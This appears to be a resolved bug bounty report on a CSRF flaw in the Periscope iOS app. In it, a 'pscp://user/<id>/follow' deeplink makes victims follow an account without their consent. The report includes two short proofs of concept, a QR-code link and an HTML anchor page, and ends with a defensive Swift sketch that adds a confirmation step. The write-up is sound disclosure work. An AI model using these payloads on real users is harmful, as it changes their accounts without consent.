
Periscope iOS app CSRF in follow action due to deeplink

Low
X
X (Formerly Twitter)
Submitted None
Reported by mgf15

Vulnerability Details

Technical details and impact analysis

Cross-Site Request Forgery (CSRF)
## Summary

This issue is mainly in the Periscope iOS app against CSRF follow action using deeplink. As in the report #583987, the CSRF works on the iOS app.

POC 1: QR code to follow a Periscope profile

`pscp://user/periscopeco/follow`

███████

POC 2 by kunal94

```
<!DOCTYPE html>
<html>
<a href="pscp://user/<any user-id>/follow">CSRF DEMO</a>
</html>
```

Video: █████████

## Impact

CSRF Follow against any user in Periscope iOS app
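A defensive sketch of the issue class in this report, added here as an example (not code from the report or from Periscope): a deep-link router that classifies `follow` as a state-changing action and returns a confirmation requirement instead of performing it when the link is opened. The type names, the username pattern and the read-only `pscp://user/<id>` profile route are assumptions.

```swift
import Foundation

// Hypothetical router model; names are illustrative, not the app's real code.
enum DeepLinkAction: Equatable {
    case viewProfile(user: String)   // assumed read-only route
    case follow(user: String)        // the route from the report

    // State-changing actions must never run on link open alone.
    var changesState: Bool {
        if case .follow = self { return true }
        return false
    }
}

enum RouteDecision: Equatable {
    case perform(DeepLinkAction)             // read-only navigation
    case requireConfirmation(DeepLinkAction) // prompt; act only on an explicit tap
    case reject                              // unknown or malformed link
}

func parse(_ url: URL) -> DeepLinkAction? {
    guard url.scheme?.lowercased() == "pscp",
          url.host?.lowercased() == "user" else { return nil }
    let parts = url.pathComponents.filter { $0 != "/" }
    // Assumed username format; reject anything else before it reaches app logic.
    guard let user = parts.first,
          user.range(of: "^[A-Za-z0-9_]{1,64}$", options: .regularExpression) != nil
    else { return nil }
    switch parts.count {
    case 1: return .viewProfile(user: user)
    case 2 where parts[1] == "follow": return .follow(user: user)
    default: return nil
    }
}

// The link source (web page, QR code, another app) is untrusted, so the
// decision depends only on what the action does, never on who sent it.
func route(_ url: URL) -> RouteDecision {
    guard let action = parse(url) else { return .reject }
    return action.changesState ? .requireConfirmation(action) : .perform(action)
}

// Constructed sample links.
for s in ["pscp://user/periscopeco/follow", "pscp://user/periscopeco", "pscp://user/a/b/follow"] {
    if let u = URL(string: s) { print(s, "->", route(u)) }
}
```

The caller would present the confirmation UI for `.requireConfirmation` and issue the follow request only after the user accepts it.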

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Bounty

$2940.00

Submitted

Weakness

Cross-Site Request Forgery (CSRF)